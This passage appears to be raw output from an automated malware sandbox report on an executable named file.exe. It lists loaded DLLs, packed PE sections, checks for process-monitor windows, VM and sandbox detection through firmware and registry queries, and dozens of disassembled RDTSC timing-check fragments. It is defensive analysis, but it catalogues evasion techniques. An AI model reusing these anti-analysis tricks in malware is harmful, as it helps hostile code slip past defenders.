              Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: webio.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: file.exeStatic file information: File size 2964992 > 1048576
              Source: file.exeStatic PE information: Raw size of pbzdrecb is bigger than: 0x100000 < 0x2a8800

              Data Obfuscation

              barindex
              Detected unpacking (changes PE section rights)
              Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.fd0000.0.unpack :EW;.rsrc :W;.idata :W;pbzdrecb:EW;nwxoinbz:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;pbzdrecb:EW;nwxoinbz:EW;.taggant:EW;
              Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
              Source: file.exeStatic PE information: real checksum: 0x2e3aae should be: 0x2deec3
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .rsrc
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name: pbzdrecb
              Source: file.exeStatic PE information: section name: nwxoinbz
              Source: file.exeStatic PE information: section name: .taggant
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0149775F push cs; iretd 0_3_01497760
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0149775F push cs; iretd 0_3_01497760
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0148C72D push ebx; ret 0_3_0148C75F
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0148C72D push ebx; ret 0_3_0148C75F
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0148B7AC push ebx; ret 0_3_0148B7CC
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0148B7AC push ebx; ret 0_3_0148B7CC
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_014978A7 push ds; retf 0_3_014978A8
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_014978A7 push ds; retf 0_3_014978A8
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_014DC4D0 push cs; retf 0_3_014DC4DA
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_014DC4D0 push cs; retf 0_3_014DC4DA
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_014DC4D0 push cs; retf 0_3_014DC4DA
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_014DC4D0 push cs; retf 0_3_014DC4DA
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_014DC4F9 push cs; iretd 0_3_014DC4FA
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_014DC4F9 push cs; iretd 0_3_014DC4FA
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_014DC4F9 push cs; iretd 0_3_014DC4FA
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_014DC4F9 push cs; iretd 0_3_014DC4FA
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_014DC499 push cs; ret 0_3_014DC49A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_014DC499 push cs; ret 0_3_014DC49A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_014DC499 push cs; ret 0_3_014DC49A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_014DC499 push cs; ret 0_3_014DC49A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_014DCBA4 push es; retf 0_3_014DCBBB
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_014DCBA4 push es; retf 0_3_014DCBBB
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_014714FF push ds; retf 0_3_01471500
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0149775F push cs; iretd 0_3_01497760
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0149775F push cs; iretd 0_3_01497760
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0148C72D push ebx; ret 0_3_0148C75F
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0148C72D push ebx; ret 0_3_0148C75F
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0148B7AC push ebx; ret 0_3_0148B7CC
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0148B7AC push ebx; ret 0_3_0148B7CC
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_014978A7 push ds; retf 0_3_014978A8
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_014978A7 push ds; retf 0_3_014978A8
              Source: file.exeStatic PE information: section name: entropy: 7.971219963000856

              Boot Survival

              barindex
              Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonclassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Query firmware table information (likely to detect VMs)
              Source: C:\Users\user\Desktop\file.exeSystem information queried: FirmwareTableInformationJump to behavior
              Tries to detect sandboxes / dynamic malware analysis system (registry check)
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
              Tries to detect virtualization through RDTSC time measurements
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A2FF4 second address: 11A2FF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A2FF8 second address: 11A3013 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFACBF2F91h 0x00000007 push eax 0x00000008 push edx 0x00000009 ja 00007EFFACBF2F86h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A3013 second address: 11A3017 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A22A6 second address: 11A22B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A22B0 second address: 11A22B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A2723 second address: 11A2757 instructions: 0x00000000 rdtsc 0x00000002 jng 00007EFFACBF2F8Ch 0x00000008 push edi 0x00000009 jmp 00007EFFACBF2F98h 0x0000000e push edi 0x0000000f pop edi 0x00000010 pop edi 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A2757 second address: 11A276F instructions: 0x00000000 rdtsc 0x00000002 jne 00007EFFAC79DCC6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007EFFAC79DCCAh 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A276F second address: 11A2775 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A2775 second address: 11A277B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A579F second address: 11A57A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A57A4 second address: 11A57E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFAC79DCD2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push esi 0x0000000b jmp 00007EFFAC79DCD8h 0x00000010 pop esi 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 jc 00007EFFAC79DCD4h 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A57E3 second address: 11A57F5 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007EFFACBF2F86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 pop ecx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A57F5 second address: 11A5819 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007EFFAC79DCD6h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A5819 second address: 102ED9E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFACBF2F94h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a mov ecx, ebx 0x0000000c push dword ptr [ebp+122D06C9h] 0x00000012 push 00000000h 0x00000014 push esi 0x00000015 call 00007EFFACBF2F88h 0x0000001a pop esi 0x0000001b mov dword ptr [esp+04h], esi 0x0000001f add dword ptr [esp+04h], 00000016h 0x00000027 inc esi 0x00000028 push esi 0x00000029 ret 0x0000002a pop esi 0x0000002b ret 0x0000002c or cl, FFFFFFE1h 0x0000002f call dword ptr [ebp+122D26F6h] 0x00000035 pushad 0x00000036 jmp 00007EFFACBF2F8Ch 0x0000003b xor eax, eax 0x0000003d mov dword ptr [ebp+122D2558h], ebx 0x00000043 mov edx, dword ptr [esp+28h] 0x00000047 sub dword ptr [ebp+122D2558h], ecx 0x0000004d mov dword ptr [ebp+122D2D6Fh], eax 0x00000053 stc 0x00000054 mov esi, 0000003Ch 0x00000059 jmp 00007EFFACBF2F99h 0x0000005e add esi, dword ptr [esp+24h] 0x00000062 js 00007EFFACBF2F98h 0x00000068 jmp 00007EFFACBF2F92h 0x0000006d lodsw 0x0000006f mov dword ptr [ebp+122D2558h], eax 0x00000075 add eax, dword ptr [esp+24h] 0x00000079 jmp 00007EFFACBF2F96h 0x0000007e mov ebx, dword ptr [esp+24h] 0x00000082 mov dword ptr [ebp+122D2A76h], ebx 0x00000088 push eax 0x00000089 push eax 0x0000008a push edx 0x0000008b jc 00007EFFACBF2F88h 0x00000091 pushad 0x00000092 popad 0x00000093 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A587B second address: 11A5880 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A5880 second address: 11A5890 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A5890 second address: 11A58B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFAC79DCCCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a stc 0x0000000b push 00000000h 0x0000000d mov edx, 551D85EBh 0x00000012 push B7DF818Bh 0x00000017 push ebx 0x00000018 ja 00007EFFAC79DCCCh 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A58B7 second address: 11A595D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 add dword ptr [esp], 48207EF5h 0x0000000c mov si, dx 0x0000000f mov edi, dword ptr [ebp+122D1C0Ch] 0x00000015 push 00000003h 0x00000017 sub dword ptr [ebp+122D3852h], edi 0x0000001d push 00000000h 0x0000001f movzx edx, cx 0x00000022 push 00000003h 0x00000024 push 00000000h 0x00000026 push ebx 0x00000027 call 00007EFFACBF2F88h 0x0000002c pop ebx 0x0000002d mov dword ptr [esp+04h], ebx 0x00000031 add dword ptr [esp+04h], 0000001Ah 0x00000039 inc ebx 0x0000003a push ebx 0x0000003b ret 0x0000003c pop ebx 0x0000003d ret 0x0000003e mov dword ptr [ebp+122D1BFFh], edx 0x00000044 mov ecx, dword ptr [ebp+122D2DC7h] 0x0000004a push 9E19B35Eh 0x0000004f jg 00007EFFACBF2F9Fh 0x00000055 add dword ptr [esp], 21E64CA2h 0x0000005c or ecx, dword ptr [ebp+122D26E1h] 0x00000062 lea ebx, dword ptr [ebp+1244A6A4h] 0x00000068 jbe 00007EFFACBF2F8Ch 0x0000006e mov ecx, dword ptr [ebp+122D2DC7h] 0x00000074 add dl, 00000029h 0x00000077 xchg eax, ebx 0x00000078 push eax 0x00000079 push edx 0x0000007a jmp 00007EFFACBF2F8Bh 0x0000007f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A595D second address: 11A599B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007EFFAC79DCCBh 0x00000008 jmp 00007EFFAC79DCD2h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 pushad 0x00000012 pushad 0x00000013 jmp 00007EFFAC79DCD0h 0x00000018 push edi 0x00000019 pop edi 0x0000001a popad 0x0000001b pushad 0x0000001c push esi 0x0000001d pop esi 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A5A7A second address: 11A5A7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A5A7E second address: 11A5AD2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c popad 0x0000000d xor dword ptr [esp], 093B9BD5h 0x00000014 push esi 0x00000015 clc 0x00000016 pop esi 0x00000017 adc dh, FFFFFFB2h 0x0000001a push 00000003h 0x0000001c push eax 0x0000001d mov edx, dword ptr [ebp+122D1C0Ch] 0x00000023 pop edx 0x00000024 push 00000000h 0x00000026 call 00007EFFAC79DCCEh 0x0000002b jmp 00007EFFAC79DCCEh 0x00000030 pop ecx 0x00000031 push 00000003h 0x00000033 push A19EF54Ch 0x00000038 push eax 0x00000039 push edx 0x0000003a jnl 00007EFFAC79DCC8h 0x00000040 pushad 0x00000041 popad 0x00000042 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A5AD2 second address: 11A5ADC instructions: 0x00000000 rdtsc 0x00000002 jc 00007EFFACBF2F8Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A5ADC second address: 11A5B17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 xor dword ptr [esp], 619EF54Ch 0x0000000d mov dword ptr [ebp+122D1BE8h], ecx 0x00000013 lea ebx, dword ptr [ebp+1244A6ADh] 0x00000019 mov dword ptr [ebp+122D343Bh], ebx 0x0000001f mov edx, dword ptr [ebp+122D2BDFh] 0x00000025 push eax 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007EFFAC79DCD3h 0x0000002d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A5B17 second address: 11A5B21 instructions: 0x00000000 rdtsc 0x00000002 jc 00007EFFACBF2F8Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A5BCD second address: 11A5C15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ebx 0x00000008 add dword ptr [esp], 0DADA6F8h 0x0000000f mov dx, FA4Bh 0x00000013 push 00000003h 0x00000015 mov cx, 7480h 0x00000019 push 00000000h 0x0000001b add edx, dword ptr [ebp+122D2B43h] 0x00000021 push 00000003h 0x00000023 push edi 0x00000024 mov dword ptr [ebp+122D1BD7h], ecx 0x0000002a pop esi 0x0000002b push ACFD08BFh 0x00000030 pushad 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007EFFAC79DCD5h 0x00000038 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A5C15 second address: 11A5C19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B74BB second address: 11B74C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C4463 second address: 11C4470 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jc 00007EFFACBF2F86h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C4470 second address: 11C44A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFAC79DCD4h 0x00000007 jl 00007EFFAC79DCC6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007EFFAC79DCD0h 0x00000016 push edx 0x00000017 pop edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C4622 second address: 11C4627 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C4627 second address: 11C4664 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFAC79DCD2h 0x00000007 jmp 00007EFFAC79DCCFh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jnp 00007EFFAC79DCFBh 0x00000014 jno 00007EFFAC79DCCCh 0x0000001a push eax 0x0000001b push edx 0x0000001c push ebx 0x0000001d pop ebx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C47DD second address: 11C47FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFACBF2F94h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a push ecx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C4959 second address: 11C495E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C4BBD second address: 11C4BC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C4D31 second address: 11C4D37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C4D37 second address: 11C4D49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jne 00007EFFACBF2F86h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C4D49 second address: 11C4D7B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFAC79DCD9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jg 00007EFFAC79DCC6h 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007EFFAC79DCCBh 0x00000017 popad 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C4D7B second address: 11C4D96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007EFFACBF2F86h 0x0000000a jmp 00007EFFACBF2F91h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C4F03 second address: 11C4F2C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFAC79DCCDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c jmp 00007EFFAC79DCD4h 0x00000011 pop edi 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C50C8 second address: 11C50E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFFACBF2F92h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C50E3 second address: 11C50E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C526E second address: 11C527C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 ja 00007EFFACBF2F86h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C5606 second address: 11C5629 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b jmp 00007EFFAC79DCD7h 0x00000010 pop ecx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BAA14 second address: 11BAA19 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C5794 second address: 11C579A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C579A second address: 11C57A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C5DB3 second address: 11C5DB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C64B5 second address: 11C64CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 popad 0x00000008 js 00007EFFACBF2FA8h 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 pop edi 0x00000012 ja 00007EFFACBF2F86h 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C96F0 second address: 11C96F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C96F5 second address: 11C9707 instructions: 0x00000000 rdtsc 0x00000002 jne 00007EFFACBF2F88h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C9707 second address: 11C970B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C970B second address: 11C970F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CB885 second address: 11CB8A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFAC79DCD9h 0x00000007 jng 00007EFFAC79DCCEh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
